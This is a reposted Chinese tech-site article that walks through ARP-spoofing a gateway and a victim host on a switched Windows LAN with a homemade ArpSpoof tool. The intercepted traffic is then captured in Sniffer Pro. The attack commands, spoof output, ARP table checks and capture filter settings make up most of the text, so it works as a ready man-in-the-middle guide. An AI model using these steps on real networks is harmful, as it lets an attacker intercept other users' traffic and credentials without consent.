论坛登陆 注册 文章专区 投稿文章 旧版浏览
首页 | 页界资讯 | 安全动态 | 网络应用 | 组网技术 | 软件应用 | 工具软件 | 网管知识 | 帮助
文学 | 操作系统 | 注 册 表 | 编程语言 | 数 据 库 | 服 务 器 | 网页设计 | 图形图象 | VIP
论坛 | 网络安全 | 安全防范 | 黑客技术 | 硬件学堂 | 路由技术 | 搜索研究 | 站长经验 | 投稿
专题 | 教育频道 | 特色专题 | 精文荟萃 | 聊天通讯 | 网络文学 | 论坛社区 | 广告服务 | 旧版
设为首页 加入收藏
当前位置:首页>>文章>>网络安全>>安全工具>>正文

Windows交换环境中ARP Sniffer的实现
www.xker.com 作者:不详 来源:网络转载 加入日期:2005-12-6 12:00:25
根据交换环境中Sniffer实现的原理(详见交换环境下Sniffer的实现),我写了一个类似于Linux环境下的ArpSpoof实现在Windows环境下的Arp Sniffer。34527345864515516500www.xker.com41168223130835167612

在交换环境下Windows中实现Sniffer需要具备的条件:

1、安装Winpcap驱动。

2、我写了一个类似于Linux环境下的ArpSpoof(我只在Windows 2000 Server下测试过,其他期待您的测试)。

3、一个Sniffer,如NetXray或者NAI Sniffer Pro(推荐)。

具体的实现方法:

使用ArpSpoof实现基于ARP的欺骗:

C:\>arpspoof.exe

ARPSpoof, by netXeyes, Special Thanks BB

www.netXeyes.com 2002, dansnow@21cn.com

Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]

 

其中Spoof IP1和Spoof IP2是想要进行欺骗和嗅探的IP地址,Own IP是自己的IP地址(注意这三个IP必须是在同一个局域网内没有跨越交换机或者路由器)。

例如目前公司的局域网环境为192.168.0.xxx,子网掩码为255.255.255.0,网关为192.168.0.1。我们的IP为192.168.0.29,想要Sniffer 192.168.0.2的数据包。

由于网关为192.168.0.1,所以我们就只要欺骗192.168.0.1和192.168.0.2就可以了。也就是说告诉192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告诉192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。这样以来所有的数据包都会发到192.168.0.29,并且由192.168.0.29实现转发(windows 2000默认可以进行包转发,至于Windows 9.x和Windows NT/XP我没有测试过,希望您可以告诉我)。

C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29

ARPSpoof, by netXeyes, Special Thanks BB

www.netXeyes.com 2002, dansnow@21cn.com

Begin Spoof.........

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

.....................................................

是时候对192.168.0.1和192.168.0.2的ARP欺骗就开始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一样的。

C:\>arp -a

Interface: 192.168.0.1 on Interface 0x1000004

Internet Address Physical Address Type

192.168.0.2 00-00-86-61-6b-4e dynamic

192.168.0.29 00-00-86-61-6b-4e dynamic

同样在192.168.0.2上面也会发现192.168.0.1和192.168.0.29的MAC地址是一样的。

这样我们就在192.168.0.1和192.168.0.2之间实现了ARP欺骗。

启动Sniffer Pro,在Define Filter里面的Address Type中选择Hardware(注意不要选为通常的类型IP,否则抓不到什么有意义的东西),Station1和Station2选择设置为Any即可。

这时候就开始Sniffer了。

以上结果在我局域网环境中测试通过,不保证适用于所有的环境。

在开发及测试的过程中得到了BB的大力协助,以至于耽误了其看八卦新闻的时间,内疚了很久......:-)

上一篇:Sniffer在网吧网络维护中的综合应用
下一篇:网络管理员的好帮手--Sniffer
关闭窗口】【浏览次数:】【发送给好友】【收藏此页
相关文章 最新文章 热门文章

·Sniffer安全技术专题
·NAI的Sniffer系统
·局域网监听的原理、实现与防范
·简述Sniffer
·如何发现和防止Sniffer
·sniffer原理
·Sniffer含义及工作原理
·深入学习Linux下的网络监听技术
·防范网络嗅探
·Sniffer黑客教程
·QQ密码丢失后能做的事情:快速找回密码
·免费代理IP(每日更新)
·系统优化 专题
·找回QQ密码的注意事项 
·最经典的黑客入门教材
·WinRAR 3.51 注册码
·怎样查找对方的IP地址
·求职简历封皮
·史上最强QQ个人档案资料欣赏
·个人简历表格
评论 本站声明
会员名称:
 密码:匿名 ·注册·忘记密码?
评论内容:
(最多300个字符)
  查看评论
【注】 发表评论必需遵守以下条例:
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
  • 本站大部分为网络转载,如有版权问题,请通知我们,我们立即更正!
设为首页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
Copyright © 2003-2005 xker.com All rights reserved. 网站合作、广告联系QQ:12231446
小新技术网 冀ICP备05002857号